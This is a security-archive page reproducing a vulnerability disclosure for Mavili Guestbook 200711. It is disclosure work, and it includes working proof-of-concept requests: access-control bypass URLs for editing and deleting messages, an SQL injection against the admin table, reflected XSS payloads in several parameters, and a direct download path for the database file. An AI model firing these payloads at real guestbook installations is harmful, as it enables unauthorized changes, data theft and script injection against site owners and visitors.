what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mavili Guestbook 200711 Cross Site Scripting / SQL Injection

Mavili Guestbook 200711 Cross Site Scripting / SQL Injection
Posted Jan 3, 2012
Authored by demonalex

Mavili Guestbook version 200711 suffers from bypass, cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 7a96c95fdfcde2cd584dd9411b3e01e71dd7226c0bdd39df56803b16c1ceece5

Mavili Guestbook 200711 Cross Site Scripting / SQL Injection

Change Mirror Download
Title: mavili guestbook - SQL Injection and XSS Vulnerabilities

Software : mavili guestbook

Software Version : 200711

Vendor: http://code.google.com/p/maviliguestbook/

Vulnerability Published : 2012-01-03

Vulnerability Update Time :

Status :

Impact : High

Bug Description :
mavili guestbook(version update : 200711) is vulnerable with Security Access Control Bypass, SQL Injection, XSS, etc.

Proof Of Concept :
1)Security Access Control Bypass:
User can edit, approve and delete messages without admin permission, POC below (Remarks: id=91 exists was necessary) :
1.1)GET http://192.168.10.211/edit.asp?id=91
1.2)GET http://192.168.10.211/delete.asp?id=91
1.3)GET http://192.168.10.211/approve.asp?id=91&show=true

2)SQL Injection:
2.1)id in /edit.asp, PoC below (Remarks: id=91 exists was necessary) :
GET http://192.168.10.211/edit.asp?id=92 and 0<(select count(*) from [admin])

3)XSS:
3.1)id in /approve.asp, PoC:
GET http://192.168.10.211/approve.asp?id=<SCRipt>alert('demonalex')</scrIPT>&show=true
3.2)id in /delete.asp, PoC:
GET http://192.168.10.211/delete.asp?id=<SCRipt>alert('demonalex')</scrIPT>
3.3)id in /edit.asp, PoC:
GET http://192.168.10.211/edit.asp?id=<SCRipt>alert('demonalex')</scrIPT>
3.4)id in /edit2.asp, PoC:
POST http://192.168.10.211/edit2.asp
------------------------------------
id=<SCRipt>alert('demonalex')</scrIPT>&name=aaa&country=1&email=aaa@163.com&website=http://&submit=Send&message=aaa

4)Default Database Path:
4.1)GET http://192.168.10.211/guestbook.mdb

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close